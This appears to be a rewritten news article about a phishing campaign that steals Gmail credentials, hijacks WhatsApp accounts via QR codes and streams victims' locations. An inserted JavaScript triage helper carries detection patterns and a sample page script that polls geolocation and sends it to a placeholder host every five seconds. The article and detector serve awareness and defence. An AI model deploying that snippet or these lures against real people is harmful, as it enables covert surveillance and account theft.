**Hacking Campaign Targets High-Profile Gmail and WhatsApp Users Across Middle East**
As Iran grapples with the longest nationwide internet shutdown in its history, a sophisticated hacking campaign has been targeting high-profile individuals across the Middle East, including Gmail and WhatsApp users.
Nariman Gharib, a U.K.-based Iranian activist who monitors digital activity related to Iranian protests, tweeted about his own experience with the phishing campaign. He shared screenshots of a suspicious link sent via WhatsApp message, warning others not to click on similar links. TechCrunch obtained the full phishing link and analyzed its source code, along with input from security researchers.
Our analysis suggests that the campaign aimed to steal Gmail and other online credentials, compromise WhatsApp accounts, and conduct surveillance by stealing location data, photos, and audio recordings. However, it remains unclear whether the hackers are government-linked agents, spies, or cybercriminals – or a combination of all three.
**Phishing Campaign's M.O.**
The phishing site used a dynamic DNS provider called DuckDNS to mask its real location. TechCrunch discovered that the attackers had registered a subdomain under duckdns.org that resolved to a server hosting the phishing page at alex-fabow.online.
Once the victim clicked on the suspicious link, they were redirected to a fake Gmail login page or asked for their phone number. The source code of the phishing page revealed a flaw: by modifying its URL in the browser, TechCrunch was able to view a file containing over 850 records of information submitted by victims during the attack flow.
These records included copies of usernames and passwords entered on the phishing page, as well as incorrect entries and two-factor codes. The exposed file showed that the campaign targeted Windows, macOS, iPhone, and Android users, and in one case, revealed a victim's entry attempts until they entered their correct password and two-factor authentication code.
**Surveillance and Hijacking**
Beyond credential theft, the campaign also enabled surveillance by tricking victims into sharing their location, audio, and pictures from their device. In Gharib's case, tapping on the link opened a fake WhatsApp-themed page displaying a QR code, which would instantly link the victim's WhatsApp account to a device controlled by the attacker.
Security researcher Runa Sandvik examined the phishing page code and found that it triggered browser permission prompts asking for access to location data (via navigator.geolocation) and to photos/audio. If the victim accepted, the browser sent their coordinates to the attacker and kept sharing their location every few seconds for as long as the page remained open.
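As an added illustration, not part of TechCrunch's analysis or of the phishing page's own code, the following triage helper takes saved page source and flags the capability requests and periodic exfiltration pattern Sandvik describes. The indicator patterns and the sample pages are constructed for this example.

```javascript
// Added triage helper (hypothetical, not from the article). Given captured
// page source, report which sensitive browser APIs it calls and whether the
// combination matches the "poll location/media and send it off-page" pattern.
// Indicator list is an assumption based on the behaviour described above.
const INDICATORS = [
  { id: "geolocation", re: /navigator\.geolocation\.(getCurrentPosition|watchPosition)/ },
  { id: "media-capture", re: /navigator\.mediaDevices\.getUserMedia|\bgetUserMedia\s*\(/ },
  { id: "periodic-exfil", re: /\bsetInterval\s*\(/ },
  { id: "network-send", re: /\b(fetch|XMLHttpRequest|sendBeacon)\b/ },
  { id: "notification-prompt", re: /Notification\.requestPermission/ },
];

function triagePageSource(source) {
  const hits = INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
  // Surveillance pattern: location or media access, repeated on a timer,
  // with a network send. A plain credential form alone does not qualify.
  const surveillance =
    hits.includes("network-send") &&
    hits.includes("periodic-exfil") &&
    (hits.includes("geolocation") || hits.includes("media-capture"));
  return { hits, surveillance };
}

// Constructed sample: a page that requests location and posts it every 5 s.
const SAMPLE_SURVEILLANCE = `
<script>
  function send(c) {
    fetch("https://example.invalid/collect", { method: "POST", body: JSON.stringify(c) });
  }
  navigator.geolocation.getCurrentPosition((p) => send(p.coords));
  setInterval(() => navigator.geolocation.getCurrentPosition((p) => send(p.coords)), 5000);
</script>`;

// Constructed sample: an ordinary login form with no capability requests.
const SAMPLE_BENIGN =
  '<form action="/login"><input name="user"><input name="pass" type="password"></form>';
```

Run it over a saved copy of a suspicious page; a `surveillance: true` result is a reason to treat the link as more than a credential phish and to check which permissions the browser already granted to that origin.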
**Attribution and Motivation**
It is unclear who is behind this campaign. While we don't know the identities of all victims, those we could identify include a Middle Eastern academic working in national security studies; the boss of an Israeli drone maker; a senior Lebanese cabinet minister; at least one journalist; and individuals with U.S. phone numbers.
A government-backed group might want to steal email passwords and two-factor codes of high-value targets like politicians or journalists, allowing them to download private information. The timing and targeting of this campaign could point to an espionage effort aimed at collecting information about specific individuals.
**Expert Insights**
Security researcher Gary Miller examined the phishing code and exposed data from the attacker's server. He noted that the attack "certainly [had] the hallmarks of an IRGC-linked spearphishing campaign," referring to highly targeted email hacks carried out by Iran's Islamic Revolutionary Guard Corps.
Miller pointed to the international targeting, credential theft, and social engineering techniques built into the phishing link. By contrast, a financially motivated hacker would more likely use stolen credentials for direct gain, such as stealing proprietary business information or cryptocurrency.
**Lessons Learned**
The case highlights the importance of caution when interacting with unsolicited links, especially those from popular messaging platforms like WhatsApp. As Miller notes, "Clicking on unsolicited WhatsApp links is a high-risk, unsafe practice." To securely contact this reporter, use Signal via the username: zackwhittaker.1337